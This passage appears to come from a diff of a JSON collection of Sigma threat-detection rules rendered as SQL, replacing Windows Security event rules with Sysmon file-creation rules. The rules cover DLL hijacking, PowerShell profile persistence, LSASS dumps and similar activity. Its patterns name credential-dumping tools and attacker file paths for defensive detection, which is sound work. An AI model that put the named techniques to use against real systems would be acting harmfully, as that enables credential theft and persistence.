'%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\'))" ], - "filename": "win_security_petitpotam_susp_tgt_request.yml" + "filename": "file_event_win_susp_ntds_dit.yml" }, { - "title": "Defrag Deactivation - Security", - "id": "c5a178bf-9cfb-4340-b584-e4df39b6a3e7", - "status": "test", - "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", - "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)", + "title": "Suspicious Get-Variable.exe Creation", + "id": "0c3fac91-5627-46e8-a6a8-a0d7b9b8ae1b", + "status": "experimental", + "description": "Get-Variable is a valid PowerShell cmdlet\nWindowsApps is by default in the path where PowerShell is executed.\nSo when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.\n", + "author": "frack113", "tags": [ "attack.persistence", - "attack.t1053", - "attack.s0111" + "attack.t1546", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4701' AND TaskName LIKE '\\\\Microsoft\\\\Windows\\\\Defrag\\\\ScheduledDefrag' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%Local\\\\Microsoft\\\\WindowsApps\\\\Get-Variable.exe' ESCAPE '\\')" ], - "filename": "win_security_apt_slingshot.yml" + "filename": "file_event_win_susp_get_variable.yml" }, { - "title": "Important Scheduled Task Deleted/Disabled", - "id": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", + "title": "Creation Of Non-Existent System DLL", + "id": "df6ecb8b-7822-4f4b-b412-08f524b4576c", "status": "experimental", - "description": "Detects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of system dlls that are not present on the system. Usually to achieve dll hijacking", + "author": "Nasreddine Bencherchali (Nextron Systems), fornotes", "tags": [ - "attack.execution", - "attack.privilege_escalation", + "attack.defense_evasion", "attack.persistence", - "attack.t1053.005" + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4699', '4701') AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\Schedule%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((EventID = '4699' AND SubjectUserName LIKE '%$' ESCAPE '\\' AND TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') OR TargetFilename LIKE '%\\\\SprintCSP.dll' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_susp_scheduled_task_delete_or_disable.yml" + "filename": "file_event_win_create_non_existent_dlls.yml" }, { - "title": "Remote PowerShell Sessions Network Connections (WinRM)", - "id": "13acf386-b8c6-4fe0-9a6e-c4756b974698", - "status": "test", - "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "DLL Search Order Hijackig Via Additional Space in Path", + "id": "b6f91281-20aa-446a-b986-38a92813a18f", + "status": "experimental", + "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Legitimate use of remote PowerShell execution" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5156' AND DestPort IN ('5985', '5986') AND LayerRTID = '44')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86) \\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\')" ], - "filename": "win_security_remote_powershell_session.yml" + "filename": "file_event_win_dll_sideloading_space_path.yml" }, { - "title": "Pass the Hash Activity 2", - "id": "8eef149c-bd26-49f2-9e5a-9b00e3af499b", - "status": "stable", - "description": "Detects the attack technique pass the hash which is used to move laterally inside the network", - "author": "Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)", + "title": "Potential Persistence Attempt Via ErrorHandler.Cmd", + "id": "15904280-565c-4b73-9303-3291f964e7f9", + "status": "experimental", + "description": "Detects creation of a file named \"ErrorHandler.cmd\" in the \"C:\\WINDOWS\\Setup\\Scripts\\\" directory which could be used as a method of persistence\nThe content of C:\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd is read whenever some tools under C:\\WINDOWS\\System32\\oobe\\ (e.g. Setup.exe) fail to run for any reason.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1550.002" + "attack.persistence" ], "falsepositives": [ - "Administrator activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4624' AND SubjectUserSid = 'S-1-0-0' AND LogonType = '3' AND LogonProcessName = 'NtLmSsp' AND KeyLength = '0') OR (EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo')) AND NOT (TargetUserName = 'ANONYMOUS LOGON'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\WINDOWS\\\\Setup\\\\Scripts\\\\ErrorHandler.cmd' ESCAPE '\\')" ], - "filename": "win_security_pass_the_hash_2.yml" + "filename": "file_event_win_persistence_error_handler_cmd.yml" }, { - "title": "Azure AD Health Service Agents Registry Keys Access", - "id": "1d2ab8ac-1a01-423b-9c39-001510eae8e8", - "status": "test", - "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key values and sub-keys of Azure AD Health service agents (e.g AD FS).\nInformation from AD Health service agents can be used to potentially abuse some of the features provided by those services in the cloud (e.g. Federation).\nThis detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object: HKLM:\\SOFTWARE\\Microsoft\\ADHealthAgent.\nMake sure you set the SACL to propagate to its sub-keys.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "title": "VsCode Powershell Profile Modification", + "id": "3a9fa2ec-30bc-4ebd-b49e-7c9cff225502", + "status": "experimental", + "description": "Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1012" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.013" ], "falsepositives": [ - "Unknown" + "Legitimate use of the profile by developers or administrators" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4656', '4663') AND ObjectType = 'Key' AND ObjectName LIKE '\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\ADHealthAgent' ESCAPE '\\') AND NOT ((ProcessName LIKE '%Microsoft.Identity.Health.Adfs.DiagnosticsAgent.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.InsightsService.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.MonitoringAgent.Startup.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Adfs.PshSurrogate.exe%' ESCAPE '\\' OR ProcessName LIKE '%Microsoft.Identity.Health.Common.Clients.ResourceMonitor.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Microsoft.VSCode\\_profile.ps1' ESCAPE '\\')" ], - "filename": "win_security_aadhealth_svc_agent_regkey_access.yml" + "filename": "file_event_win_susp_vscode_powershell_profile.yml" }, { - "title": "Access Token Abuse", - "id": "02f7c9c1-1ae8-4c6a-8add-04693807f92f", - "status": "experimental", - "description": "This rule tries to detect token impersonation and theft. (Example: DuplicateToken(Ex) and ImpersonateLoggedOnUser with the LOGON32_LOGON_NEW_CREDENTIALS flag.)", - "author": "Michaela Adams, Zach Mathis", + "title": "WMI Persistence - Script Event Consumer File Write", + "id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", + "status": "test", + "description": "Detects file writes of WMI script event consumer", + "author": "Thomas Patzke", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1134.001" + "attack.t1546.003", + "attack.persistence" ], "falsepositives": [ - "Anti-Virus" + "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'Advapi' AND AuthenticationPackageName = 'Negotiate' AND ImpersonationLevel LIKE '\\%\\%1833' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\')" ], - "filename": "win_security_access_token_abuse.yml" + "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml" }, { - "title": "Generic Password Dumper Activity on LSASS", - "id": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", + "title": "LSASS Process Dump Artefact In CrashDumps Folder", + "id": "6902955a-01b7-432c-b32a-6f5f81d8f625", "status": "experimental", - "description": "Detects process handle on LSASS process with certain access mask", - "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", + "description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", + "author": "@pbssubhash", "tags": [ "attack.credential_access", - "car.2019-04-004", "attack.t1003.001" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" + "Rare legitimate dump of the process by the operating system due to a crash of lsass" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4656' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessMask LIKE '%0x40%' ESCAPE '\\' OR AccessMask LIKE '%0x1400%' ESCAPE '\\' OR AccessMask LIKE '%0x100000%' ESCAPE '\\' OR AccessMask LIKE '%0x1410%' ESCAPE '\\' OR AccessMask LIKE '%0x1010%' ESCAPE '\\' OR AccessMask LIKE '%0x1438%' ESCAPE '\\' OR AccessMask LIKE '%0x143a%' ESCAPE '\\' OR AccessMask LIKE '%0x1418%' ESCAPE '\\' OR AccessMask LIKE '%0x1f0fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f1fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f2fff%' ESCAPE '\\' OR AccessMask LIKE '%0x1f3fff%' ESCAPE '\\')) OR (EventID = '4663' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (AccessList LIKE '%4484%' ESCAPE '\\' OR AccessList LIKE '%4416%' ESCAPE '\\'))) AND NOT (((ProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\lsm.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\minionhost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\VsTskMgr.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\GamingServices.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\MRT.exe' ESCAPE '\\' OR ProcessName LIKE '%RtkAudUService64' ESCAPE '\\') AND (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWow64\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysNative\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\taskhostw.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\CCM\\\\CcmExec.exe' ESCAPE '\\')) OR (ProcessName LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\aurora\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE '%\\\\x64\\\\SCENARIOENGINE.EXE' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND ProcessName LIKE '%\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND AccessList LIKE '%\\%\\%4484%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%lsass.exe.%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')" ], - "filename": "win_security_susp_lsass_dump_generic.yml" + "filename": "file_event_win_lsass_shtinkering.yml" }, { - "title": "Addition of Domain Trusts", - "id": "0255a820-e564-4e40-af2b-6ac61160335c", - "status": "stable", - "description": "Addition of domains is seldom and should be verified for legitimacy.", - "author": "Thomas Patzke", + "title": "Office Macro File Creation", + "id": "91174a41-dc8f-401b-be89-7bfc140612a0", + "status": "experimental", + "description": "Detects the creation of a new office macro files on the systems", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Legitimate extension of domain structure" + "Very common in environments that rely heavily on macro documents" ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4706')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" ], - "filename": "win_security_susp_add_domain_trust.yml" + "filename": "file_event_win_office_macro_files_created.yml" }, { - "title": "Credential Dumping Tools Service Execution - Security", - "id": "f0d1feba-4344-4ca9-8121-a6c97bd6df52", - "status": "test", - "description": "Detects well-known credential dumping tools execution via service execution events", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "title": "CVE-2021-44077 POC Default Dropped File", + "id": "7b501acf-fa98-4272-aa39-194f82edc8a3", + "status": "experimental", + "description": "Detects the creation of \"msiexec.exe\" in the \"bin\" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", "attack.execution", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006", - "attack.t1569.002", - "attack.s0005" + "cve.2021.44077" ], "falsepositives": [ - "Legitimate Administrator using credential dumping tool for password recovery" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%fgexec%' ESCAPE '\\' OR ServiceFileName LIKE '%dumpsvc%' ESCAPE '\\' OR ServiceFileName LIKE '%cachedump%' ESCAPE '\\' OR ServiceFileName LIKE '%mimidrv%' ESCAPE '\\' OR ServiceFileName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceFileName LIKE '%servpw%' ESCAPE '\\' OR ServiceFileName LIKE '%pwdump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\ManageEngine\\\\SupportCenterPlus\\\\bin\\\\msiexec.exe' ESCAPE '\\')" ], - "filename": "win_security_mal_creddumper.yml" + "filename": "file_event_win_cve_2021_44077_poc_default_files.yml" }, { - "title": "Tap Driver Installation - Security", - "id": "9c8afa4d-0022-48f0-9456-3712466f9701", - "status": "test", - "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", - "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", - "tags": [ - "attack.exfiltration", - "attack.t1048" - ], + "title": "Suspicious Interactive PowerShell as SYSTEM", + "id": "5b40a734-99b6-4b98-a1d0-1cea51a08ab2", + "status": "experimental", + "description": "Detects the creation of files that indicator an interactive use of PowerShell in the SYSTEM user context", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Legitimate OpenVPN TAP insntallation" + "Administrative activity", + "PowerShell scripts running as SYSTEM user" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%tap0901%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\PowerShell\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\PowerShell\\\\StartupProfileData-Interactive' ESCAPE '\\'))" ], - "filename": "win_security_tap_driver_installation.yml" + "filename": "file_event_win_susp_system_interactive_powershell.yml" }, { - "title": "Win Susp Computer Name Containing Samtheadmin", - "id": "39698b3f-da92-4bc6-bfb5-645a98386e45", + "title": "Potential Remote Credential Dumping Activity", + "id": "6e2a900a-ced9-4e4a-a9c2-13e706f9518a", "status": "experimental", - "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", - "author": "elhoim", + "description": "Detects default filenames output from the execution of CrackMapExec and Impacket-secretsdump against an endpoint.", + "author": "SecurityAura", "tags": [ - "cve.2021.42278", - "cve.2021.42287", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1078" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((SamAccountName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND SamAccountName LIKE '%$' ESCAPE '\\') OR (TargetUserName LIKE 'SAMTHEADMIN-%' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND TargetFilename REGEXP '\\\\Windows\\\\System32\\\\[a-zA-Z0-9]{8}\\.tmp$')" ], - "filename": "win_security_susp_computer_name.yml" + "filename": "file_event_win_remote_cred_dump.yml" }, { - "title": "Admin User Remote Logon", - "id": "0f63e1ef-1eb9-4226-9d54-8927ca08520a", + "title": "Suspicious Scheduled Task Write to System32 Tasks", + "id": "80e1f67a-4596-4351-98f5-a9c3efabac95", "status": "test", - "description": "Detect remote login by Administrator user (depending on internal pattern).", - "author": "juju4", + "description": "Detects the creation of tasks from processes executed from suspicious locations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1078.001", - "attack.t1078.002", - "attack.t1078.003", - "car.2016-04-005" + "attack.persistence", + "attack.execution", + "attack.t1053" ], "falsepositives": [ - "Legitimate administrative activity." + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND AuthenticationPackageName = 'Negotiate' AND TargetUserName LIKE 'Admin%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Windows\\\\System32\\\\Tasks%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\config\\\\systemprofile%' ESCAPE '\\'))" ], - "filename": "win_security_admin_rdp_login.yml" + "filename": "file_event_win_susp_task_write.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - Security", - "id": "fd0f5778-d3cb-4c9a-9695-66759d04702a", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + "title": "Suspicious PROCEXP152.sys File Created In TMP", + "id": "3da70954-0f2c-4103-adff-b7440368f50e", + "status": "test", + "description": "Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder.\nThis driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.\n", + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.t1562.001", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Other legimate tools using this driver and filename (like Sysinternals). Note - Clever attackers may easily bypass this detection by just renaming the driver filename. Therefore just Medium-level and don't rely on it." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ServiceFileName REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ServiceFileName REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ServiceFileName REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ServiceFileName REGEXP '\\\\*mdr\\*\\W\\s*\\)\\.Name' OR ServiceFileName REGEXP '\\$VerbosePreference\\.ToString\\(' OR ServiceFileName REGEXP '\\String\\]\\s*\\$VerbosePreference'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%PROCEXP152.sys' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\procexp64.exe%' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe%' ESCAPE '\\' OR Image LIKE '%\\\\procmon64.exe%' ESCAPE '\\' OR Image LIKE '%\\\\procmon.exe%' ESCAPE '\\')))" ], - "filename": "win_security_invoke_obfuscation_obfuscated_iex_services_security.yml" + "filename": "file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml" }, { - "title": "Security Eventlog Cleared", - "id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", + "title": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl - File", + "id": "d353dac0-1b41-46c2-820c-d7d2561fc6ed", "status": "test", - "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", + "author": "Julia Fomina, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.t1216" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Unlikely" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '517' AND Provider_Name = 'Security') OR (EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%WsmPty.xsl' ESCAPE '\\' OR TargetFilename LIKE '%WsmTxt.xsl' ESCAPE '\\') AND NOT ((TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_susp_eventlog_cleared.yml" + "filename": "file_event_win_winrm_awl_bypass.yml" }, { - "title": "DiagTrackEoP Default Login Username", - "id": "2111118f-7e46-4fc8-974a-59fd8ec95196", - "status": "experimental", - "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PowerShell Profile Modification", + "id": "b5b78988-486d-4a80-b991-930eff3ff8bf", + "status": "test", + "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", + "author": "HieuTT35, Nasreddine Bencherchali", "tags": [ - "attack.privilege_escalation" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.013" ], "falsepositives": [ - "Unlikely" + "System administrator creating Powershell profile manually" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND TargetOutboundUserName = 'thisisnotvaliduser')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\Microsoft.PowerShell\\_profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WindowsPowerShell\\\\profile.ps1' ESCAPE '\\' OR 